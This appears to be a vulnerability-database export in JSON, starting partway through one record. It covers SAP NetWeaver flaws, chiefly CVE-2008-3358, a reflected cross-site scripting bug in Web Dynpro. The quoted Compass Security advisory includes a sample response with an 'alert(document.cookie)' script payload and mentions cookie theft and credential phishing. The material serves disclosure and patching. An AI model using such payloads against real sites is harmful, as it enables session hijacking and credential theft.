Research Group (DSECRG-11-009, DSECRG-11-010,\nDSECRG-11-012, DSECRG-11-013):\nhttp://dsecrg.com/pages/vul/show.php?id=309\nhttp://dsecrg.com/pages/vul/show.php?id=310\nhttp://dsecrg.com/pages/vul/show.php?id=312\nhttp://dsecrg.com/pages/vul/show.php?id=313\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"db": "CNVD",
"id": "CNVD-2011-1071"
},
{
"db": "BID",
"id": "46853"
},
{
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "99295"
}
],
"trust": 3.24
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "46853",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "43737",
"trust": 2.5
},
{
"db": "CNVD",
"id": "CNVD-2011-1073",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-1071",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-1075",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-1077",
"trust": 0.8
},
{
"db": "IVD",
"id": "05EC05C4-1F9C-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "CB03156A-1F9B-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "E3F8C2F4-1F9B-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "E170CC48-1F9B-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "99295",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"db": "CNVD",
"id": "CNVD-2011-1071"
},
{
"db": "BID",
"id": "46853"
},
{
"db": "PACKETSTORM",
"id": "99295"
}
]
},
"id": "VAR-201103-0360",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"db": "CNVD",
"id": "CNVD-2011-1071"
}
],
"trust": 3.46917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 3.2
}
],
"sources": [
{
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"db": "CNVD",
"id": "CNVD-2011-1071"
}
]
},
"last_update_date": "2022-05-17T02:08:18.333000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver parameter vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/3280"
},
{
"title": "Patch for the SAP Netweaver \\\"logger\\\" parameter vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/3281"
},
{
"title": "SAP Netweaver \\\"logonUrl\\\" patch for parameter filtering vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/3278"
},
{
"title": "Patch for SAP NetWeaver \\342\\200\\230SOAP Adapter\\342\\200\\231 filtering vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/3276"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"db": "CNVD",
"id": "CNVD-2011-1071"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://secunia.com/advisories/43737/http"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=312"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=310"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=313"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": "/archive/1/516992"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1512776"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1438191"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/section_179/"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1450270"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://dsecrg.com/pages/vul/show.php?id=309"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43737/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43737"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43737/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"db": "CNVD",
"id": "CNVD-2011-1071"
},
{
"db": "BID",
"id": "46853"
},
{
"db": "PACKETSTORM",
"id": "99295"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"db": "CNVD",
"id": "CNVD-2011-1071"
},
{
"db": "BID",
"id": "46853"
},
{
"db": "PACKETSTORM",
"id": "99295"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-03-15T00:00:00",
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"date": "2011-03-15T00:00:00",
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"date": "2011-03-15T00:00:00",
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"date": "2011-03-15T00:00:00",
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
},
{
"date": "2011-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"date": "2011-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"date": "2011-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"date": "2011-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1071"
},
{
"date": "2011-03-14T00:00:00",
"db": "BID",
"id": "46853"
},
{
"date": "2011-03-14T03:23:26",
"db": "PACKETSTORM",
"id": "99295"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1075"
},
{
"date": "2011-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1077"
},
{
"date": "2011-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1073"
},
{
"date": "2011-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1071"
},
{
"date": "2011-03-14T18:07:00",
"db": "BID",
"id": "46853"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "46853"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Parameter vulnerability",
"sources": [
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1075"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input validation error",
"sources": [
{
"db": "IVD",
"id": "05ec05c4-1f9c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "cb03156a-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e3f8c2f4-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "e170cc48-1f9b-11e6-abef-000c29c66e3d"
},
{
"db": "BID",
"id": "46853"
}
],
"trust": 1.1
}
}
var-200901-0456
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document. SAP NetWeaver and Web Dynpro Java are prone to a cross-site scripting vulnerability because the applications fail to sufficiently sanitize user-supplied input. A successful exploit of this vulnerability could allow an attacker to compromise the application, access or modify data, or steal cookie-based authentication credentials. Other attacks are also possible. This issue is associated with SAP notification number 1235253. #############################################################
COMPASS SECURITY ADVISORY
http://www.csnc.ch/en/downloads/advisories.html
Product: NetWeaver/Web DynPro
Vendor: SAP (www.sap.com)
CVD ID: CVE-2008-3358
Subject: Cross-Site Scripting Vulnerability
Risk: High
Effect: Remotely exploitable
Author: Martin Suess martin.suess@csnc.ch
Date: January 27th 2009
Introduction:
The vulnerability found targets the SAP NetWeaver portal. It is possible to execute JavaScript code in the browser of a valid user when clicking on a specially crafted URL which can be sent to the user by email. This vulnerability can be used to steal the user's session cookie or redirect him to a phishing website which shows the (faked) login screen and gets his logon credentials as soon as he tries to log in on the faked site.
Affected:
- All tested versions that are vulnerable SAP NetWeaver/Web DynPro [for detailed Information, see SAP Notification 1235253]
Description:
A specially crafted URL in SAP NetWeaver allows an attacker to launch a Cross-Site Scripting attack. The resulting page contains only the unfiltered value of the vulnerable parameter. It is possible to create an URL which causes the resulting page to contain malicious JavaScript code. A response to such a request could look like the following example:
HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server:
The code only gets executed in Microsoft Internet Explorer (tested with version 7.0.5730 only). In Firefox (tested with version 3.0 only) it did not get executed as the content-type header of the server response is interpreted more strictly (text/plain).
SAP Information Policy:
The information is available to registered SAP clients only (SAP Security Notes).
Patches:
Apply the latest SAP security patches for Netweaver.
Timeline:
Vendor Status: Patch released Vendor Notified: July 21st 2008 Vendor Response: July 28th 2008 Patch available: October 2008 Advisory Release: January 27th 2009
References:
- SAP Notification 1235253 (problem and patches) . ----------------------------------------------------------------------
Did you know that a change in our assessment rating, exploit code availability, or if an updated patch is released by the vendor, is not part of this mailing-list?
Click here to learn more: http://secunia.com/advisories/business_solutions/
TITLE: SAP NetWeaver Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID: SA33685
VERIFY ADVISORY: http://secunia.com/advisories/33685/
CRITICAL: Less critical
IMPACT: Cross Site Scripting
WHERE:
From remote
SOFTWARE: SAP NetWeaver 4.x http://secunia.com/advisories/product/9490/
DESCRIPTION: A vulnerability has been reported in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks.
Input passed via the URL is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Successful exploitation may require that the victim uses a browser which executes JavaScript statements in documents of the content type "text/plain" (e.g. Internet Explorer).
SOLUTION: The vendor has reportedly issued a patch via SAP Note 1235253. http://service.sap.com/sap/support/notes/1235253
PROVIDED AND/OR DISCOVERED BY: Martin Suess, Compass Security
ORIGINAL ADVISORY: SAP: http://service.sap.com/sap/support/notes/1235253
Compass Security: http://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200901-0456",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 1.4,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver application server sp21",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "6.40104329.313"
},
{
"model": "netweaver application server sp17",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "6.40104329.313"
},
{
"model": "netweaver nw04s sp9",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver portal sp21",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "2004"
},
{
"model": "netweaver application server sp17",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "6.40"
},
{
"model": "netweaver nw04 sp17",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver nw04 sp15",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver portal",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "2004.."
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver nw04s sp10",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver sp20",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "640"
},
{
"model": "netweaver nw04s sp8",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver nw04s sp11",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver developer studio sp21",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "2004"
},
{
"model": "netweaver nw04s sp7",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "web dynpro runtime core components sp12",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "700"
},
{
"model": "netweaver nw04 sp18",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver nw04 sp19",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver nw04 sp16",
"scope": null,
"trust": 0.3,
"vendor": "sap",
"version": null
},
{
"model": "netweaver portal sp17",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "2004"
},
{
"model": "netweaver developer studio sp17",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "-2004"
}
],
"sources": [
{
"db": "BID",
"id": "33465"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"db": "NVD",
"id": "CVE-2008-3358"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3358"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Martin Suess",
"sources": [
{
"db": "BID",
"id": "33465"
},
{
"db": "PACKETSTORM",
"id": "74357"
}
],
"trust": 0.4
},
"cve": "CVE-2008-3358",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2008-3358",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-3358",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200901-384",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-001639"
},
{
"db": "NVD",
"id": "CVE-2008-3358"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-384"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document. SAP NetWeaver and Web Dynpro Java are prone to a cross-site scripting vulnerability because the applications fail to sufficiently sanitize user-supplied input. \nA successful exploit of this vulnerability could allow an attacker to compromise the application, access or modify data, or steal cookie-based authentication credentials. Other attacks are also possible. \nThis issue is associated with SAP notification number 1235253. #############################################################\n#\n# COMPASS SECURITY ADVISORY\n# http://www.csnc.ch/en/downloads/advisories.html\n#\n#############################################################\n#\n# Product: NetWeaver/Web DynPro\n# Vendor: SAP (www.sap.com)\n# CVD ID: CVE-2008-3358\n# Subject: Cross-Site Scripting Vulnerability\n# Risk: High\n# Effect: Remotely exploitable\n# Author: Martin Suess \u003cmartin.suess@csnc.ch\u003e\n# Date: January 27th 2009\n#\n#############################################################\n\nIntroduction:\n-------------\nThe vulnerability found targets the SAP NetWeaver portal. It is\npossible to execute JavaScript code in the browser of a valid user\nwhen clicking on a specially crafted URL which can be sent to the\nuser by email. \nThis vulnerability can be used to steal the user\u0027s session cookie or\nredirect him to a phishing website which shows the (faked) login\nscreen and gets his logon credentials as soon as he tries to log in\non the faked site. \n\nAffected:\n---------\n- All tested versions that are vulnerable\n\tSAP NetWeaver/Web DynPro\n\t[for detailed Information, see SAP Notification 1235253]\n\nDescription:\n------------\nA specially crafted URL in SAP NetWeaver allows an attacker to\nlaunch a Cross-Site Scripting attack. The resulting page contains\nonly the unfiltered value of the vulnerable parameter. It is possible\nto create an URL which causes the resulting page to contain malicious\nJavaScript code. A response to such a request could look like the\nfollowing example:\n\nHTTP/1.1 200 OK\nDate: Fri, 18 Jul 2008 13:13:30 GMT\nServer: \u003cserver\u003e\ncontent-type: text/plain\nContent-Length: 67\nKeep-Alive: timeout=10, max=500\nConnection: Keep-Alive\n\n\u003chtml\u003e\u003ctitle\u003etest\u003c/title\u003e\u003cbody onload=\"alert(document.cookie)\"\u003e\n\u003c/body\u003e\u003c/html\u003e\n\nThe code only gets executed in Microsoft Internet Explorer (tested\nwith version 7.0.5730 only). In Firefox (tested with version 3.0\nonly) it did not get executed as the content-type header of the\nserver response is interpreted more strictly (text/plain). \n\nSAP Information Policy:\n-----------------------\nThe information is available to registered SAP clients only (SAP\nSecurity Notes). \n\nPatches:\n--------\nApply the latest SAP security patches for Netweaver. \n\nTimeline:\n---------\nVendor Status:\t\tPatch released\nVendor Notified:\tJuly 21st 2008\nVendor Response:\tJuly 28th 2008\nPatch available:\tOctober 2008\nAdvisory Release:\tJanuary 27th 2009\n\nReferences:\n-----------\n- SAP Notification 1235253 (problem and patches)\n. ----------------------------------------------------------------------\n\nDid you know that a change in our assessment rating, exploit code\navailability, or if an updated patch is released by the vendor, is\nnot part of this mailing-list?\n\nClick here to learn more:\nhttp://secunia.com/advisories/business_solutions/\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Cross-Site Scripting Vulnerability\n\nSECUNIA ADVISORY ID:\nSA33685\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/33685/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nCross Site Scripting\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nSAP NetWeaver 4.x\nhttp://secunia.com/advisories/product/9490/\n\nDESCRIPTION:\nA vulnerability has been reported in SAP NetWeaver, which can be\nexploited by malicious people to conduct cross-site scripting\nattacks. \n\nInput passed via the URL is not properly sanitised before being\nreturned to the user. This can be exploited to execute arbitrary HTML\nand script code in a user\u0027s browser session in context of an affected\nsite. \n\nSuccessful exploitation may require that the victim uses a browser\nwhich executes JavaScript statements in documents of the content type\n\"text/plain\" (e.g. Internet Explorer). \n\nSOLUTION:\nThe vendor has reportedly issued a patch via SAP Note 1235253. \nhttp://service.sap.com/sap/support/notes/1235253\n\nPROVIDED AND/OR DISCOVERED BY:\nMartin Suess, Compass Security\n\nORIGINAL ADVISORY:\nSAP:\nhttp://service.sap.com/sap/support/notes/1235253\n\nCompass Security:\nhttp://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody 